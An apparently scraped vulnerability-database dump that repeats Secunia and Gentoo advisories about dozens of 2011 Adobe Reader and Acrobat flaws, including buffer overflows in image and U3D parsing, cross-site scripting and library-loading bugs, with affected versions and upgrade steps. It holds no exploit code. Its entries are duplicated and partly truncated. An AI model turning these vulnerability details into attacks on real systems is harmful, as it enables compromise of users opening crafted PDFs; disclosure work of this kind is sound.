Adobe Reader and Acrobat 10.x before 10.0.1, 9.x before 9.4.2, and 8.x before 8.2.6 on Windows and Mac OS X do not properly validate unspecified input data, which allows attackers to execute arbitrary code via unknown vectors. Adobe Acrobat and Reader are prone to a remote code-execution vulnerability. Attackers can exploit this issue to execute arbitrary code in the context of the user running the affected application. Adobe Reader and Acrobat versions prior to 9.4.2 and 10.0.1 are affected. For more information: SA43207 SOLUTION: Updated packages are available via Red Hat Network. ---------------------------------------------------------------------- Get a tax break on purchases of Secunia Solutions! If you are a U.S. company, you may be qualified for a tax break for your software purchases. Learn more at: http://secunia.com/products/corporate/vim/section_179/ ---------------------------------------------------------------------- TITLE: Adobe Reader / Acrobat Multiple Vulnerabilities SECUNIA ADVISORY ID: SA43207 VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/43207/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=43207 RELEASE DATE: 2011-02-09 DISCUSS ADVISORY: http://secunia.com/advisories/43207/#comments AVAILABLE ON SITE AND IN CUSTOMER AREA: * Last Update * Popularity * Comments * Criticality Level * Impact * Where * Solution Status * Operating System / Software * CVE Reference(s) http://secunia.com/advisories/43207/ ONLY AVAILABLE IN CUSTOMER AREA: * Authentication Level * Report Reliability * Secunia PoC * Secunia Analysis * Systems Affected * Approve Distribution * Remediation Status * Secunia CVSS Score * CVSS https://ca.secunia.com/?page=viewadvisory&vuln_id=43207 ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI: * AUTOMATED SCANNING http://secunia.com/vulnerability_scanning/personal/ http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/ DESCRIPTION: Multiple vulnerabilities have been reported in Adobe Reader / Acrobat, which can be exploited by malicious, local users to gain escalated privileges and by malicious people to conduct cross-site scripting attacks and compromise a user's system. 2) An unspecified error can be exploited to corrupt memory. 3) An unspecified error related to file permissions in Windows-based versions can be exploited to gain escalated privileges. 4) An unspecified error may allow code execution. 5) An unspecified error when parsing images can be exploited to corrupt memory. 6) An error in AcroRd32.dll when parsing certain images can be exploited to corrupt memory. 7) An unspecified error in the Macintosh-based versions may allow code execution. 9) An unspecified error may allow code execution. 10) A input validation error may allow code execution. 11) An input validation error can be exploited to conduct cross-site scripting attacks. 13) An unspecified error can be exploited to corrupt memory. 14) A boundary error when decoding U3D image data in an IFF file can be exploited to cause a buffer overflow. 15) A boundary error when decoding U3D image data in a RGBA file can be exploited to cause a buffer overflow. 16) A boundary error when decoding U3D image data in a BMP file can be exploited to cause a buffer overflow. 17) A boundary error when decoding U3D image data in a PSD file can be exploited to cause a buffer overflow. 18) An input validation error when parsing fonts may allow code execution. 19) A boundary error when decoding U3D image data in a FLI file can be exploited to cause a buffer overflow. 20) An error in 2d.dll when parsing height and width values of RLE_8 compressed BMP files can be exploited to cause a heap-based buffer overflow. 21) An integer overflow in ACE.dll when parsing certain ICC data can be exploited to cause a buffer overflow. 22) A boundary error in rt3d.dll when parsing bits per pixel and number of colors if 4/8-bit RLE compressed BMP files can be exploited to cause a heap-based buffer overflow. 23) An error in the U3D implementation when handling the Parent Node count can be exploited to cause a buffer overflow. 24) A boundary error when processing JPEG files embedded in a PDF file can be exploited to corrupt heap memory. 25) An unspecified error when parsing images may allow code execution. 26) An input validation error can be exploited to conduct cross-site scripting attacks. 27) An unspecified error in the Macintosh-based versions may allow code execution. 28) A boundary error in rt3d.dll when parsing certain files can be exploited to cause a stack-based buffer overflow. 29) An integer overflow in the U3D implementation when parsing a ILBM texture file can be exploited to cause a buffer overflow. 30) Some vulnerabilities are caused due to vulnerabilities in the bundled version of Adobe Flash Player. For more information: SA43267 The vulnerabilities are reported in versions 8.2.5 and prior, 9.4.1 and prior, and 10.0 and prior. SOLUTION: Update to version 8.2.6, 9.4.2, or 10.0.1. Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ PROVIDED AND/OR DISCOVERED BY: 2) Bing Liu, Fortinet's FortiGuard Labs. 6) Abdullah Ada via ZDI. 8) Haifei Li, Fortinet's FortiGuard Labs. 14 - 17, 19, 20, 22, 29) Peter Vreugdenhil via ZDI. 21) Sebastian Apelt via ZDI. 23) el via ZDI. 14) Sean Larsson, iDefense Labs. 28) An anonymous person via ZDI. The vendor also credits: 1) Mitja Kolsek, ACROS Security. 3) Matthew Pun. 4, 5, 18) Tavis Ormandy, Google Security Team. 7) James Quirk. 9) Brett Gervasoni, Sense of Security. 10) Joe Schatz. 11, 26) Billy Rios, Google Security Team. 12) Greg MacManus, iSIGHT Partners Labs and Parvez Anwar. 13) CESG. 25) Will Dormann, CERT. 27) Marc Schoenefeld, Red Hat Security Response Team. ORIGINAL ADVISORY: Adobe (APSB11-03) http://www.adobe.com/support/security/bulletins/apsb11-03.html http://www.adobe.com/support/security/bulletins/apsb11-02.html ZDI: http://www.zerodayinitiative.com/advisories/ZDI-11-065/ http://www.zerodayinitiative.com/advisories/ZDI-11-066/ http://www.zerodayinitiative.com/advisories/ZDI-11-067/ http://www.zerodayinitiative.com/advisories/ZDI-11-068/ http://www.zerodayinitiative.com/advisories/ZDI-11-069/ http://www.zerodayinitiative.com/advisories/ZDI-11-070/ http://www.zerodayinitiative.com/advisories/ZDI-11-071/ http://www.zerodayinitiative.com/advisories/ZDI-11-072/ http://www.zerodayinitiative.com/advisories/ZDI-11-073/ http://www.zerodayinitiative.com/advisories/ZDI-11-074/ http://www.zerodayinitiative.com/advisories/ZDI-11-075/ http://www.zerodayinitiative.com/advisories/ZDI-11-077/ FortiGuard Labs: http://www.fortiguard.com/advisory/FGA-2011-06.html iDefense: http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=891 OTHER REFERENCES: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ DEEP LINKS: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ EXTENDED DESCRIPTION: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ EXTENDED SOLUTION: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ EXPLOIT: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/advisories/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ---------------------------------------------------------------------- . - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 201201-19 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: Normal Title: Adobe Reader: Multiple vulnerabilities Date: January 30, 2012 Bugs: #354211, #382969, #393481 ID: 201201-19 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis ======== Multiple vulnerabilities in Adobe Reader might allow remote attackers to execute arbitrary code or conduct various other attacks. Affected packages ================= ------------------------------------------------------------------- Package / Vulnerable / Unaffected ------------------------------------------------------------------- 1 app-text/acroread < 9.4.7 >= 9.4.7=20 Description =========== Multiple vulnerabilities have been discovered in Adobe Reader. Please review the CVE identifiers referenced below for details. Impact ====== A remote attacker could entice a user to open a specially crafted PDF file using Adobe Reader, possibly resulting in the remote execution of arbitrary code, a Denial of Service, or other impact. Workaround ========== There is no known workaround at this time. Resolution ========== All Adobe Reader users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=app-text/acroread-9.4.7" References ========== [ 1 ] CVE-2010-4091 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4091 [ 2 ] CVE-2011-0562 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0562 [ 3 ] CVE-2011-0563 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0563 [ 4 ] CVE-2011-0565 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0565 [ 5 ] CVE-2011-0566 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0566 [ 6 ] CVE-2011-0567 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0567 [ 7 ] CVE-2011-0570 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0570 [ 8 ] CVE-2011-0585 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0585 [ 9 ] CVE-2011-0586 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0586 [ 10 ] CVE-2011-0587 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0587 [ 11 ] CVE-2011-0588 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0588 [ 12 ] CVE-2011-0589 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0589 [ 13 ] CVE-2011-0590 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0590 [ 14 ] CVE-2011-0591 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0591 [ 15 ] CVE-2011-0592 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0592 [ 16 ] CVE-2011-0593 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0593 [ 17 ] CVE-2011-0594 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0594 [ 18 ] CVE-2011-0595 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0595 [ 19 ] CVE-2011-0596 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0596 [ 20 ] CVE-2011-0598 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0598 [ 21 ] CVE-2011-0599 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0599 [ 22 ] CVE-2011-0600 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0600 [ 23 ] CVE-2011-0602 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0602 [ 24 ] CVE-2011-0603 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0603 [ 25 ] CVE-2011-0604 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0604 [ 26 ] CVE-2011-0605 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0605 [ 27 ] CVE-2011-0606 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0606 [ 28 ] CVE-2011-2130 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2130 [ 29 ] CVE-2011-2134 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2134 [ 30 ] CVE-2011-2135 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2135 [ 31 ] CVE-2011-2136 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2136 [ 32 ] CVE-2011-2137 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2137 [ 33 ] CVE-2011-2138 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2138 [ 34 ] CVE-2011-2139 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2139 [ 35 ] CVE-2011-2140 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2140 [ 36 ] CVE-2011-2414 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2414 [ 37 ] CVE-2011-2415 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2415 [ 38 ] CVE-2011-2416 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2416 [ 39 ] CVE-2011-2417 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2417 [ 40 ] CVE-2011-2424 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2424 [ 41 ] CVE-2011-2425 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2425 [ 42 ] CVE-2011-2431 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2431 [ 43 ] CVE-2011-2432 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2432 [ 44 ] CVE-2011-2433 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2433 [ 45 ] CVE-2011-2434 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2434 [ 46 ] CVE-2011-2435 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2435 [ 47 ] CVE-2011-2436 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2436 [ 48 ] CVE-2011-2437 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2437 [ 49 ] CVE-2011-2438 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2438 [ 50 ] CVE-2011-2439 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2439 [ 51 ] CVE-2011-2440 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2440 [ 52 ] CVE-2011-2441 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2441 [ 53 ] CVE-2011-2442 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2442 [ 54 ] CVE-2011-2462 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2462 [ 55 ] CVE-2011-4369 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-4369 Availability ============ This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-201201-19.xml Concerns? ========= Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org. License ======= Copyright 2012 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5
VAR-201102-0033 CVE-2011-0587 Adobe Reader and Acrobat Vulnerable to cross-site scripting CVSS V2: 4.3
CVSS V3: -
Severity: MEDIUM
Cross-site scripting (XSS) vulnerability in Adobe Reader and Acrobat 10.x before 10.0.1, 9.x before 9.4.2, and 8.x before 8.2.6 on Windows and Mac OS X allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, a different vulnerability than CVE-2011-0604. Adobe Reader and Acrobat A cross-site scripting vulnerability exists. This vulnerability CVE-2011-0604 Is a different vulnerability.By any third party Web Script or HTML May be inserted. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. Remote attackers can inject arbitrary web scripts or HTML with unknown vectors. For more information: SA43207 SOLUTION: Updated packages are available via Red Hat Network. ---------------------------------------------------------------------- Get a tax break on purchases of Secunia Solutions! If you are a U.S. company, you may be qualified for a tax break for your software purchases. Learn more at: http://secunia.com/products/corporate/vim/section_179/ ---------------------------------------------------------------------- TITLE: Adobe Reader / Acrobat Multiple Vulnerabilities SECUNIA ADVISORY ID: SA43207 VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/43207/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=43207 RELEASE DATE: 2011-02-09 DISCUSS ADVISORY: http://secunia.com/advisories/43207/#comments AVAILABLE ON SITE AND IN CUSTOMER AREA: * Last Update * Popularity * Comments * Criticality Level * Impact * Where * Solution Status * Operating System / Software * CVE Reference(s) http://secunia.com/advisories/43207/ ONLY AVAILABLE IN CUSTOMER AREA: * Authentication Level * Report Reliability * Secunia PoC * Secunia Analysis * Systems Affected * Approve Distribution * Remediation Status * Secunia CVSS Score * CVSS https://ca.secunia.com/?page=viewadvisory&vuln_id=43207 ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI: * AUTOMATED SCANNING http://secunia.com/vulnerability_scanning/personal/ http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/ DESCRIPTION: Multiple vulnerabilities have been reported in Adobe Reader / Acrobat, which can be exploited by malicious, local users to gain escalated privileges and by malicious people to conduct cross-site scripting attacks and compromise a user's system. 1) An unspecified error related to library loading can be exploited to execute arbitrary code. 2) An unspecified error can be exploited to corrupt memory. 3) An unspecified error related to file permissions in Windows-based versions can be exploited to gain escalated privileges. 4) An unspecified error may allow code execution. 5) An unspecified error when parsing images can be exploited to corrupt memory. 6) An error in AcroRd32.dll when parsing certain images can be exploited to corrupt memory. 7) An unspecified error in the Macintosh-based versions may allow code execution. 8) An unspecified error related to library loading can be exploited to execute arbitrary code. 9) An unspecified error may allow code execution. 10) A input validation error may allow code execution. 11) An input validation error can be exploited to conduct cross-site scripting attacks. 12) An unspecified error related to library loading can be exploited to execute arbitrary code. 13) An unspecified error can be exploited to corrupt memory. 14) A boundary error when decoding U3D image data in an IFF file can be exploited to cause a buffer overflow. 15) A boundary error when decoding U3D image data in a RGBA file can be exploited to cause a buffer overflow. 16) A boundary error when decoding U3D image data in a BMP file can be exploited to cause a buffer overflow. 17) A boundary error when decoding U3D image data in a PSD file can be exploited to cause a buffer overflow. 18) An input validation error when parsing fonts may allow code execution. 19) A boundary error when decoding U3D image data in a FLI file can be exploited to cause a buffer overflow. 20) An error in 2d.dll when parsing height and width values of RLE_8 compressed BMP files can be exploited to cause a heap-based buffer overflow. 21) An integer overflow in ACE.dll when parsing certain ICC data can be exploited to cause a buffer overflow. 22) A boundary error in rt3d.dll when parsing bits per pixel and number of colors if 4/8-bit RLE compressed BMP files can be exploited to cause a heap-based buffer overflow. 23) An error in the U3D implementation when handling the Parent Node count can be exploited to cause a buffer overflow. 24) A boundary error when processing JPEG files embedded in a PDF file can be exploited to corrupt heap memory. 25) An unspecified error when parsing images may allow code execution. 26) An input validation error can be exploited to conduct cross-site scripting attacks. 27) An unspecified error in the Macintosh-based versions may allow code execution. 28) A boundary error in rt3d.dll when parsing certain files can be exploited to cause a stack-based buffer overflow. 29) An integer overflow in the U3D implementation when parsing a ILBM texture file can be exploited to cause a buffer overflow. 30) Some vulnerabilities are caused due to vulnerabilities in the bundled version of Adobe Flash Player. For more information: SA43267 The vulnerabilities are reported in versions 8.2.5 and prior, 9.4.1 and prior, and 10.0 and prior. SOLUTION: Update to version 8.2.6, 9.4.2, or 10.0.1. Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ PROVIDED AND/OR DISCOVERED BY: 2) Bing Liu, Fortinet's FortiGuard Labs. 6) Abdullah Ada via ZDI. 8) Haifei Li, Fortinet's FortiGuard Labs. 14 - 17, 19, 20, 22, 29) Peter Vreugdenhil via ZDI. 21) Sebastian Apelt via ZDI. 23) el via ZDI. 14) Sean Larsson, iDefense Labs. 28) An anonymous person via ZDI. The vendor also credits: 1) Mitja Kolsek, ACROS Security. 3) Matthew Pun. 4, 5, 18) Tavis Ormandy, Google Security Team. 7) James Quirk. 9) Brett Gervasoni, Sense of Security. 10) Joe Schatz. 11, 26) Billy Rios, Google Security Team. 12) Greg MacManus, iSIGHT Partners Labs and Parvez Anwar. 13) CESG. 25) Will Dormann, CERT. 27) Marc Schoenefeld, Red Hat Security Response Team. ORIGINAL ADVISORY: Adobe (APSB11-03) http://www.adobe.com/support/security/bulletins/apsb11-03.html http://www.adobe.com/support/security/bulletins/apsb11-02.html ZDI: http://www.zerodayinitiative.com/advisories/ZDI-11-065/ http://www.zerodayinitiative.com/advisories/ZDI-11-066/ http://www.zerodayinitiative.com/advisories/ZDI-11-067/ http://www.zerodayinitiative.com/advisories/ZDI-11-068/ http://www.zerodayinitiative.com/advisories/ZDI-11-069/ http://www.zerodayinitiative.com/advisories/ZDI-11-070/ http://www.zerodayinitiative.com/advisories/ZDI-11-071/ http://www.zerodayinitiative.com/advisories/ZDI-11-072/ http://www.zerodayinitiative.com/advisories/ZDI-11-073/ http://www.zerodayinitiative.com/advisories/ZDI-11-074/ http://www.zerodayinitiative.com/advisories/ZDI-11-075/ http://www.zerodayinitiative.com/advisories/ZDI-11-077/ FortiGuard Labs: http://www.fortiguard.com/advisory/FGA-2011-06.html iDefense: http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=891 OTHER REFERENCES: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ DEEP LINKS: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ EXTENDED DESCRIPTION: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ EXTENDED SOLUTION: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ EXPLOIT: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/advisories/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ---------------------------------------------------------------------- . - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 201201-19 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: Normal Title: Adobe Reader: Multiple vulnerabilities Date: January 30, 2012 Bugs: #354211, #382969, #393481 ID: 201201-19 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis ======== Multiple vulnerabilities in Adobe Reader might allow remote attackers to execute arbitrary code or conduct various other attacks. Affected packages ================= ------------------------------------------------------------------- Package / Vulnerable / Unaffected ------------------------------------------------------------------- 1 app-text/acroread < 9.4.7 >= 9.4.7=20 Description =========== Multiple vulnerabilities have been discovered in Adobe Reader. Please review the CVE identifiers referenced below for details. Impact ====== A remote attacker could entice a user to open a specially crafted PDF file using Adobe Reader, possibly resulting in the remote execution of arbitrary code, a Denial of Service, or other impact. Workaround ========== There is no known workaround at this time. Resolution ========== All Adobe Reader users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=app-text/acroread-9.4.7" References ========== [ 1 ] CVE-2010-4091 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4091 [ 2 ] CVE-2011-0562 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0562 [ 3 ] CVE-2011-0563 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0563 [ 4 ] CVE-2011-0565 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0565 [ 5 ] CVE-2011-0566 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0566 [ 6 ] CVE-2011-0567 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0567 [ 7 ] CVE-2011-0570 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0570 [ 8 ] CVE-2011-0585 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0585 [ 9 ] CVE-2011-0586 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0586 [ 10 ] CVE-2011-0587 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0587 [ 11 ] CVE-2011-0588 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0588 [ 12 ] CVE-2011-0589 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0589 [ 13 ] CVE-2011-0590 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0590 [ 14 ] CVE-2011-0591 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0591 [ 15 ] CVE-2011-0592 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0592 [ 16 ] CVE-2011-0593 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0593 [ 17 ] CVE-2011-0594 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0594 [ 18 ] CVE-2011-0595 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0595 [ 19 ] CVE-2011-0596 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0596 [ 20 ] CVE-2011-0598 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0598 [ 21 ] CVE-2011-0599 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0599 [ 22 ] CVE-2011-0600 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0600 [ 23 ] CVE-2011-0602 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0602 [ 24 ] CVE-2011-0603 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0603 [ 25 ] CVE-2011-0604 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0604 [ 26 ] CVE-2011-0605 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0605 [ 27 ] CVE-2011-0606 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0606 [ 28 ] CVE-2011-2130 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2130 [ 29 ] CVE-2011-2134 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2134 [ 30 ] CVE-2011-2135 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2135 [ 31 ] CVE-2011-2136 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2136 [ 32 ] CVE-2011-2137 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2137 [ 33 ] CVE-2011-2138 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2138 [ 34 ] CVE-2011-2139 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2139 [ 35 ] CVE-2011-2140 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2140 [ 36 ] CVE-2011-2414 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2414 [ 37 ] CVE-2011-2415 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2415 [ 38 ] CVE-2011-2416 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2416 [ 39 ] CVE-2011-2417 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2417 [ 40 ] CVE-2011-2424 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2424 [ 41 ] CVE-2011-2425 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2425 [ 42 ] CVE-2011-2431 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2431 [ 43 ] CVE-2011-2432 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2432 [ 44 ] CVE-2011-2433 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2433 [ 45 ] CVE-2011-2434 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2434 [ 46 ] CVE-2011-2435 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2435 [ 47 ] CVE-2011-2436 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2436 [ 48 ] CVE-2011-2437 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2437 [ 49 ] CVE-2011-2438 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2438 [ 50 ] CVE-2011-2439 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2439 [ 51 ] CVE-2011-2440 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2440 [ 52 ] CVE-2011-2441 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2441 [ 53 ] CVE-2011-2442 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2442 [ 54 ] CVE-2011-2462 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2462 [ 55 ] CVE-2011-4369 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-4369 Availability ============ This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-201201-19.xml Concerns? ========= Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org. License ======= Copyright 2012 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5
VAR-201102-0031 CVE-2011-0585 Adobe Reader and Acrobat Vulnerable to arbitrary code execution CVSS V2: 9.3
CVSS V3: -
Severity: HIGH
Unspecified vulnerability in Adobe Reader and Acrobat 10.x before 10.0.1, 9.x before 9.4.2, and 8.x before 8.2.6 on Windows and Mac OS X allows attackers to cause a denial of service or possibly execute arbitrary code via unknown vectors, a different vulnerability than CVE-2011-0565. This vulnerability CVE-2011-0565 Is a different vulnerability.Denial of service by attacker (DoS) Could be put into a state or execute arbitrary code. Adobe Acrobat and Reader are prone to a remote denial-of-service vulnerability. Attackers can exploit this issue to cause the affected application to crash. Arbitrary code execution may be possible; this has not been confirmed. Adobe Reader and Acrobat versions prior to 9.4.2 and 10.0.1 are affected. For more information: SA43207 SOLUTION: Updated packages are available via Red Hat Network. ---------------------------------------------------------------------- Get a tax break on purchases of Secunia Solutions! If you are a U.S. company, you may be qualified for a tax break for your software purchases. Learn more at: http://secunia.com/products/corporate/vim/section_179/ ---------------------------------------------------------------------- TITLE: Adobe Reader / Acrobat Multiple Vulnerabilities SECUNIA ADVISORY ID: SA43207 VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/43207/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=43207 RELEASE DATE: 2011-02-09 DISCUSS ADVISORY: http://secunia.com/advisories/43207/#comments AVAILABLE ON SITE AND IN CUSTOMER AREA: * Last Update * Popularity * Comments * 